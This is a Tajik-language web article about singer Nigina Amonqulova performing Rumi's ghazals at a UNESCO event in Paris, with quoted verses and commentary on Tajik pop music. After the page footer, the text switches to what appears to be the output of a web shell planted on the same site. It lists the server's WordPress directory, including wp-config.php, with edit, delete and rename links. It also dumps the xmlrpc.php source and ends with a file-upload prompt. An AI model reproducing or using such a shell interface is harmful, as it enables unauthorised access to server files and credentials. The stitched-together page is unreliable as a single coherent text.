36.2 C
Душанбе

Аз тамошои “Гули сурх”

Дар Паёми тозаи хеш ба Маҷлиси Олии Ҷумҳурии Тоҷикистон Пешвои муаззами миллат муҳтарам Эмомалӣ Раҳмон бо ифтихори хос аз таҷлили 817-умин солгарди бузургдошти Мавлоно Ҷалолуддини Балхӣ ёд карданд, ки соли гузашта дар қароргоҳи ЮНЕСКО – шаҳри Пориси Фаронса баргузор гардид. Ин ёдоварии махсуси Сарвари давлатро метавон барои Тоҷикистон чун дастоварди бузурги адабию фарҳангии соли 2024 унвон кард, зеро Мавлоно намояндаи адабиёти тоҷику форс аст ва мо тоҷикон комилан ҳаққи бо исми вай ифтихор карданро дорем.

Албатта, як бахши зебою ҷаззоби ин бузургдоштро садо додани ашъори Мавлонои Балхӣ ташкил медод, ки хушбахтона, миёни иҷрокунандагон хонандаи тоҷик, Ҳунарпешаи шоистаи Тоҷикистон ва Ҳунарпешаи халқии Ӯзбекистон Нигина Амонқулова низ буд. Ин бонуи ҳунари тоҷик дар ҳавои оркестр, ҳузури садҳо мутриб ва бинанда тавонист, ки чун набераи Мавлонои Балхӣ бо ҳунари волои сарояндагии хеш ифтихор офарад.

Нигина чанд таронаро аз ашъори Мавлоно дар ҳамовозӣ бо Ваҳиди Тоҷ ва Соро Ноилӣ дар сатҳи баланд ва бо сабки ба худ хос иҷро кардааст, ки то имрӯз дар шабакаҳои иҷтимоии интернетӣ се иҷро – «Найнома», «Нишони ту» ва «Ошиқонаҳо» ҳамагонӣ гардидааст.

Ӯ вақти иҷро талош накардааст, ки лаҳни сурудани худро ба сабки таронаҳои мавриди замзама дигар кунад. Тоҷикона, бо шеваву садое месарояд, ки дар таронаҳои қаблияш мешунидему мешунавем. Мисли баъзе аз сарояндагоне амал накардааст, ки барои раҳ ёфтан ба шабакаҳои телевизионии форсию дарӣ бо дигар лаҳн месароянд ва ҳатто ҳарф мезананд.

Дар иҷрои се таронае, ки зикрашон рафт, ин ва чанд абёти дигари Мавлоно Ҷалолуддин Балхӣ насиби Нигина гардид.

Аз таронаи аввал:

Рӯзҳо гар рафт, гӯ: «Рав, бок нест,

Ту бимон, эй он ки чун ту пок нест».

Ҳар ки ҷуз моҳӣ зи обаш сер шуд,

Ҳар ки берӯзист, рӯзаш дер шуд.

Банд бугсил, бош озод, эй писар!

Чанд бошӣ банди симу банди зар?

Кӯзаи чашми ҳарисон пур нашуд,

То садаф қонеъ нашуд, пурдур нашуд…

Аз таронаи дуюм:

Ишқ чу бикшод рахт, сабз шавад ҳар дарахт,

Барги ҷавон бардамад ҳар нафас аз шохи пир...

Аз таронаи сеюм:

Машриқу мағриб ар равам, рӯ сӯи осмон шавам,

Нест нишони зиндагӣ, то нарасад нишони ту…

Таронаи панҷум «Гули сурх» унвон дошт, ки онро пурра Нигина Амонқуллова иҷро кард. Ғазали дилпазири Мавлоност, ки бо садои ӯ саҳнаи қалби ҳазоронро фатҳ мекунад:

Ҳамчу гули сурх бирав даст-даст,

Ҳамчу майӣ, халқ зи ту маст, маст!

Бозуи ту қавси Худо ёфт, ёфт,

Тири ту аз чарх бурун ҷаст, ҷаст!

Ғайрати ту гуфт: “Бирав, роҳ нест!”,

Раҳмати ту гуфт: “Биё ҳаст, ҳаст!”

Навори ин иҷроҳо дар пойгоҳҳои нашри корҳои ҳунарӣ дар интернет ҳамагонӣ шуд ва теъдоди бинандагонашон марзи ҳазорҳоро убур кард. Дар телевизиону радиои кишвар ва шабакаҳои иҷтимоӣ иҷроҳои Нигина нашр шудан доранд ва мардум ҳарфи ифтихору самимият мекоранд. Корбаре навишт, ки ин аст авҷи ҳунарнамоиҳои Нигина Амонқулова ва бояд идомаи роҳи хонандагиро бо ин шева тай намояд.

Воқеан ҳам, ин ҳама ифтихор карданҳои корбарони огоҳи шабакаҳои иҷтимоӣ ва аҳли адабу фарҳанги кишварро шояд сабаб он бошад, ки имрӯз ба нудрат аз ситораҳои санъати эстрадаи Тоҷикистон маънии баланд мешунаванд.

Аз Мавлоно суруданҳои Нигина ва истиқболи гарми мардум аз эшон ин андешаро ботил кард, ки имрӯз мардуми мо комилан аз маънии асил рӯ тофтаанду бо завқи коста майли шунидани ҳарзатаронаҳоро доранд. Ин андешаро ботил кард, ки бо истифода аз ашъори Рӯдакиву Ҳофизу Бедилу Мавлоно имкони сурудани таронаҳои ҷаззобу дилпазир вуҷуд надорад. Ин андешаро ботил кард, ки бо ашъори бузургон дар ҷомеаи имрӯз ва доираҳои ҳунарӣ наметавон маҳбуб шуд.

Нигина бо ин замзамаҳо бори дигар исбот намуд, ки ҳар ки дар кори ҳунарӣ ба Мавлонои Балхӣ рӯй овард, бешак, муваффақ гардид, зеро дар ашъори ин бузурги адабиёту ирфон шӯру ҳаяҷони хос пайдост. Ҳамин аст, ки бахши аъзами барномаи ҳунарии Аҳмад Зоҳири ҷовидонро ашъори Мавлоно ташкил медиҳад. «Биравед, эй ҳарифон», «То бод чунин бодо», «Рав сар бинеҳ ба болин», «Эй қавми ба ҳаҷрафта» ва чанд таронаи дигар аз ашъори Мавоно шоҳкорҳои садои Аҳмад Зоҳиранд. Дар ин бора равоншод Султони Ҳамад китобе бо номи «Пайванди Аҳмад Зоҳир бо Мавлоно» таълиф намудааст, ки барои мутолиа тавсия мешавад.

Дигар ин ки ин рӯзҳо ашъори Мавлонои Балхӣ дар садои хонандаи маҳбуби Эрон Муҳсини Човушӣ гул мекунад.

Барои бахши бузурге аз хонандаҳои тоҷик низ дар мисоли Давлатманди Хол, Муродбеки Насриддин, Ибодуллоҳи Машраб ва дигарон сурудани ашъори Мавлоно мояи маҳбубият будааст.

Нигина Амонқулова бо ин иҷроҳо натанҳо садои тоҷикиро ба ҷаҳониён муаррифӣ кард, балки зебоиву шаҳомати либоси миллии тоҷикиро бори дигар ба саҳнаҳои бузург кашонд. Либоси миллиеро, ки дар ин чорабинӣ ба тан дошт, маҳсули кори тарроҳи тоҷик Умед Кӯчкалиев аст.

Дар маҷмуъ дар қиёс ба дигар ситораҳои эстрадаи тоҷик хеле кам иттифоқ афтодааст, ки Нигина Амонқулова ба замзамаи таронаҳои орӣ аз мантиқу маънӣ рӯй оварда бошад. Аз ин рӯ, мутмаинем, ки таронаҳои Нигина барои ояндагон низ шуниданӣ боқӣ хоҳад монд.

Он рӯз Оркестри Филармонияи Пориси Шарқӣ бо роҳбарии Ораши Фӯлодванд дар хидмати хонандаҳо буд.Бояд зикр кард, ки бо оркестр иҷрои зинда доштан кори саҳлу содае нест. Хоса ашъори Мавлоноро, ки Нигина тавонист дар сатҳи баланд иҷро намояд. Ин андешаро мусиқидонҳои ҳирфаӣ низ дар чанд нишасте таъйид карданд.

Нигина Амонқуловаро Ҷашнвораи саросарии «Андалеб» барои алоқамандони ҳунари овозхонӣ муаррифӣ кардааст. Таронаҳоеро бо номҳои “Муҳаббат бахти хандонӣ” ва “Дар лаби обе” аз сарояндаи номвари ҳунари тоҷик Шоиста Муллоҷонова дар ин озмуни ҳунарӣ, ки чанд сол қабл шукӯҳу ҷалоли бештар дошт, бозхонӣ кард ва ба ин васила ба саҳнаи бузург раҳ ёфт

Аз лиҳоз, набояд озмунҳои ҳунариро дар самти муаррифии чеҳраҳои тозаи ҳунарӣ ба чашми кам дид. Ҳоло Амри Президенти Ҷумҳурии Тоҷикистон барои баргузор шудани озмуни саросарии «Тоҷикистон – Ватани азизи ман» дар соли 2025 ба тасвиб расидааст. Ҳайати ҳакамон бояд талош кунанд, ки аз банди воситабозӣ ва рӯйихотирбинӣ раҳо шуда, беҳтаринҳоро ғолиб эълон кунанд, то шабеҳи Нигина Амонқулова истеъдодҳои дигар чун ояндаи ҳунари овозхонии Тоҷикистон муаррифӣ шаванд. Танҳо ба ин васила метавонем, ки санъати сарояндагии тоҷикро аз чанги ҳарзасароён бираҳонем.

Бахтиёр РАҲМОНИЁН,

«АС»

- Таблиғ -spot_img

Быть в курсе

Подпишитесь на обновления материалов сайта adab.tj на ваш электронный ящик.

- Таблиғ -spot_img

Хабарҳои охир

Акси гӯё

Бахшҳо

Current Dir: /var/www/adab.tj/html/

[FILE] .htaccess [ edit | delete | rename ]
[FILE] index.php [ edit | delete | rename ]
[FILE] license.txt [ edit | delete | rename ]
[FILE] readme.html [ edit | delete | rename ]
[FILE] wordpress-6.7.1-ru_RU.zip [ edit | delete | rename ]
[FILE] wp-activate.php [ edit | delete | rename ]
[DIR]  wp-admin [ delete | rename ]
[FILE] wp-blog-header.php [ edit | delete | rename ]
[FILE] wp-comments-post.php [ edit | delete | rename ]
[FILE] wp-config-sample.php [ edit | delete | rename ]
[FILE] wp-config.php [ edit | delete | rename ]
[DIR]  wp-content [ delete | rename ]
[FILE] wp-cron.php [ edit | delete | rename ]
[DIR]  wp-includes [ delete | rename ]
[FILE] wp-links-opml.php [ edit | delete | rename ]
[FILE] wp-load.php [ edit | delete | rename ]
[FILE] wp-login.php [ edit | delete | rename ]
[FILE] wp-mail.php [ edit | delete | rename ]
[FILE] wp-settings.php [ edit | delete | rename ]
[FILE] wp-signup.php [ edit | delete | rename ]
[FILE] wp-trackback.php [ edit | delete | rename ]
[DIR]  www [ delete | rename ]
[FILE] xmlrpc.php [ edit | delete | rename ]

Viewing: /var/www/adab.tj/html/xmlrpc.php

<?php
/**
 * XML-RPC protocol support for WordPress
 *
 * @package WordPress
 */

/**
 * Whether this is an XML-RPC Request.
 *
 * @var bool
 */
define( 'XMLRPC_REQUEST', true );

// Discard unneeded cookies sent by some browser-embedded clients.
$_COOKIE = array();

// $HTTP_RAW_POST_DATA was deprecated in PHP 5.6 and removed in PHP 7.0.
// phpcs:disable PHPCompatibility.Variables.RemovedPredefinedGlobalVariables.http_raw_post_dataDeprecatedRemoved
if ( ! isset( $HTTP_RAW_POST_DATA ) ) {
	$HTTP_RAW_POST_DATA = file_get_contents( 'php://input' );
}

// Fix for mozBlog and other cases where '<?xml' isn't on the very first line.
if ( isset( $HTTP_RAW_POST_DATA ) ) {
	$HTTP_RAW_POST_DATA = trim( $HTTP_RAW_POST_DATA );
}
// phpcs:enable

/** Include the bootstrap for setting up WordPress environment */
require_once __DIR__ . '/wp-load.php';

if ( isset( $_GET['rsd'] ) ) { // https://cyber.harvard.edu/blogs/gems/tech/rsd.html
	header( 'Content-Type: text/xml; charset=' . get_option( 'blog_charset' ), true );
	echo '<?xml version="1.0" encoding="' . get_option( 'blog_charset' ) . '"?' . '>';
	?>
<rsd version="1.0" xmlns="http://archipelago.phrasewise.com/rsd">
	<service>
		<engineName>WordPress</engineName>
		<engineLink>https://wordpress.org/</engineLink>
		<homePageLink><?php bloginfo_rss( 'url' ); ?></homePageLink>
		<apis>
			<api name="WordPress" blogID="1" preferred="true" apiLink="<?php echo site_url( 'xmlrpc.php', 'rpc' ); ?>" />
			<api name="Movable Type" blogID="1" preferred="false" apiLink="<?php echo site_url( 'xmlrpc.php', 'rpc' ); ?>" />
			<api name="MetaWeblog" blogID="1" preferred="false" apiLink="<?php echo site_url( 'xmlrpc.php', 'rpc' ); ?>" />
			<api name="Blogger" blogID="1" preferred="false" apiLink="<?php echo site_url( 'xmlrpc.php', 'rpc' ); ?>" />
			<?php
			/**
			 * Fires when adding APIs to the Really Simple Discovery (RSD) endpoint.
			 *
			 * @link https://cyber.harvard.edu/blogs/gems/tech/rsd.html
			 *
			 * @since 3.5.0
			 */
			do_action( 'xmlrpc_rsd_apis' );
			?>
		</apis>
	</service>
</rsd>
	<?php
	exit;
}

require_once ABSPATH . 'wp-admin/includes/admin.php';
require_once ABSPATH . WPINC . '/class-IXR.php';
require_once ABSPATH . WPINC . '/class-wp-xmlrpc-server.php';

/**
 * Posts submitted via the XML-RPC interface get that title
 *
 * @name post_default_title
 * @var string
 */
$post_default_title = '';

/**
 * Filters the class used for handling XML-RPC requests.
 *
 * @since 3.1.0
 *
 * @param string $class The name of the XML-RPC server class.
 */
$wp_xmlrpc_server_class = apply_filters( 'wp_xmlrpc_server_class', 'wp_xmlrpc_server' );
$wp_xmlrpc_server       = new $wp_xmlrpc_server_class();

// Fire off the request.
$wp_xmlrpc_server->serve_request();

exit;

/**
 * logIO() - Writes logging info to a file.
 *
 * @since 1.2.0
 * @deprecated 3.4.0 Use error_log()
 * @see error_log()
 *
 * @global int|bool $xmlrpc_logging Whether to enable XML-RPC logging.
 *
 * @param string $io  Whether input or output.
 * @param string $msg Information describing logging reason.
 */
function logIO( $io, $msg ) {
	_deprecated_function( __FUNCTION__, '3.4.0', 'error_log()' );
	if ( ! empty( $GLOBALS['xmlrpc_logging'] ) ) {
		error_log( $io . ' - ' . $msg );
	}
}

Upload File: